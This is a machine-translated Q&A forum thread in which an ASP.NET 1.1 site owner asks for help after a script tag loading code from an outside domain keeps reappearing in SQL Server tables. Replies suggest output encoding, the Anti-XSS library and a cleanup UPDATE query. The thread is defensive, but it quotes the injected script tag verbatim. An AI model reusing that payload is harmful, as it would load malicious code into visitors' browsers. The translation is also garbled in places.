2010-09-23 16 views
5

मैं एक बहुत बड़ी परेशानी में हूं। कृपया सहायता कीजिए!!!!!!!!!!एएसपी.नेट वेबसाइट पर एक्सएसएस अटैक

मेरी वेबसाइट पर कुछ दुर्भावनापूर्ण स्क्रिप्ट </शीर्षक> < स्क्रिप्ट src = http: // google-stats50.info/ur.php> द्वारा हमला किया गया है। यह स्क्रिप्ट स्वचालित रूप से कुछ तालिका के किसी भी स्तंभ (ओं) में संलग्न है। मैंने इस स्क्रिप्ट को हटा दिया है। लेकिन कुछ घंटों के बाद, यह कुछ तालिकाओं में फिर से दिखाई दिया। लेकिन इस बार यह </शीर्षक> < स्क्रिप्ट src = http: // google-stats49.info/ur.php> है।

मेरा ग्राहक स्क्रिप्ट के बारे में शिकायत कर रहा है। उपयोग की जाने वाली तकनीक एएसपी.नेट 1.1, एसक्यूएल सर्वर 2005 है।

कृपया मदद करें।

अग्रिम धन्यवाद !!!!!!

उत्तर

2

साइट को बंद करें। आपका सर्वर अब खराब हो सकता है या नहीं। , डेटाबेस या फाइल सिस्टम

यदि यह है डीबी तो आप ठीक हो सकता है किसी को शायद एसक्यूएल इंजेक्शन उपयोग कर रहा है -

आप पता लगाने के लिए जहां परिवर्तन से आ रहे है। अनुमतियां सेट करें ताकि जब तक आपको SQL INJECTION बिंदु नहीं मिल जाता तब तक डीबी साइट द्वारा अपडेट नहीं किया जा सकता है।

यदि यह आपकी फ़ाइल सिस्टम है तो आपको शायद साइट को साफ़ और रीसेट करने की आवश्यकता है। वे अंदर हैं और आप उनसे छुटकारा नहीं पाएंगे। अपना प्रवेश बिंदु खोजें, लेकिन यह कठिन होगा।

+1

इसके अलावा, को साफ़ करने में (अनुमति नहीं दे HTML/JS) अपने उपयोगकर्ताओं आदानों का प्रयास करें। – sheeks06

+0

हम स्क्रिप्टिंग तकनीक के माध्यम से तीसरे पक्ष की वेबसाइट पर सामग्री लोड करते हैं ... यह मेरी वेबसाइट का उद्देश्य है .... क्या इसे हल करने का कोई तरीका है Asap – user423719

+0

शायद बहुत देर हो चुकी है, लेकिन अगर ऐसी चीजें होती हैं और यह Asap है, तो आप आमतौर पर एक विशेषज्ञ को किराए पर लेने की जरूरत है। एक बहुत महंगा विशेषज्ञ। – Dann

4

जब आप डेटाबेस से टेक्स्ट प्रस्तुत करते हैं तो आप इस स्क्रिप्ट से बचने के लिए दो तरीकों का उपयोग कर सकते हैं।

  1. उपयोगकर्ता Server.HtmlEncode(DataFromDatabase);
  2. Microsoft Anti-Cross dll library का उपयोग करें जिसमें अधिक विकल्पों के साथ एक समान कार्य है।

Last MS Anti-XSS library now 3.1 है।
How to using video

वे इस स्क्रिप्ट को कैसे पास करते हैं।

  1. संपर्क या अन्य रूपों पर।
  2. आंकड़ों के ब्राउज़र संदर्भ पर और जब वे आपकी साइट ब्राउज़ करते हैं, तो आप इसके बारे में एक लॉग रखते हैं और जब आप इस लॉग को देखने के लिए जाते हैं तो स्क्रिप्ट चल रही है।

इस सहायता की आशा करें।

+0

ठीक है..धन्यवाद ..... मैं इन रोकथामों को अपने आवेदन में लागू करूंगा। लेकिन क्या स्क्रिप्ट को हटाने का कोई त्वरित समाधान है? – user423719

+0

मैं नहीं जानता कि वे इस स्क्रिप्ट को कैसे पास कर रहे हैं और इसे डेटाबेस में इंजेक्शन दे रहे हैं। – user423719

+0

@ user423719 मैंने अपने उत्तर 2 टाइप तरीकों से टाइप किया है, यह कैसे संपर्क कर रहा है, संपर्क फ़ॉर्म से, या आपके द्वारा लॉग किए गए ब्राउज़र डेटा से। स्क्रिप्ट को न हटाएं, बस इसे चलाने के लिए न बनाएं, फिर पता लगाएं कि कैसे दर्ज किया गया है और यदि आप चाहें तो आप अधिक उपाय कर सकते हैं। – Aristos

0

मैं अनुशंसा करता हूं कि आप आईआईएस में बाध्यकारी सभी बाहरी होस्टहेडर को हटा दें। यही कारण है कि आप किसी भी ग्राहक की तुम्हारा संक्रमित हो सकता है बिना स्थानीय स्तर पर समस्या का पता लगाने के लिए अनुमति देता/से

0

एक त्वरित उपाय

के बाद चोरी हो एक समाधान नहीं है, लेकिन इस के साथ आप एक में डेटाबेस से स्क्रिप्ट को हटा सकते हैं एक प्रश्न मैं अब के लिए क्या करता हूँ :)।


अद्यतन TABLE_NAME सेट स्तंभ = REPLACE (कास्ट (स्तंभ nvarchar के रूप में (मैक्स)), 'http://google-stats49.info/ur।php> ',' ')


यह एक शब्द खोजने और बदलने में काम करता है। यदि आपको वायरस स्क्रिप्ट के बारे में कोई भी सामान पता चलता है, तो इसे यहां पोस्ट करें।

सादर, मसूद

+0

हाय दोस्तों, मिल गया एक और इंजेक्शन लिंक। ऐसा लगता है कि यह एक ही बॉट द्वारा इंजेक्शन दिया जा रहा है। यहां लिंक पोस्ट करें।book

+0

यह बार-बार दिखाई देता है। मैंने Web.config फ़ाइल में संवेदनशील जानकारी एन्क्रिप्ट की है। मुझे लगता है कि इसने स्क्रिप्ट को लगभग 24 घंटों तक फिर से दिखाना बंद कर दिया। लेकिन यह फिर से आया। कृपया मदद करे। – user423719

0

एक ही समस्या यहाँ ... यह 15.30 के बारे में शुरू किया और 4 टेबल को संक्रमित ... यहाँ पूर्ण डेटाबेस खोज के लिए समाधान है: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html बस इसे अलग तालिका नाम वापस जाने के लिए संपादित करें।

और इस मसूद रूप में काम करेंगे उल्लेख

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '') 
संबंधित मुद्दे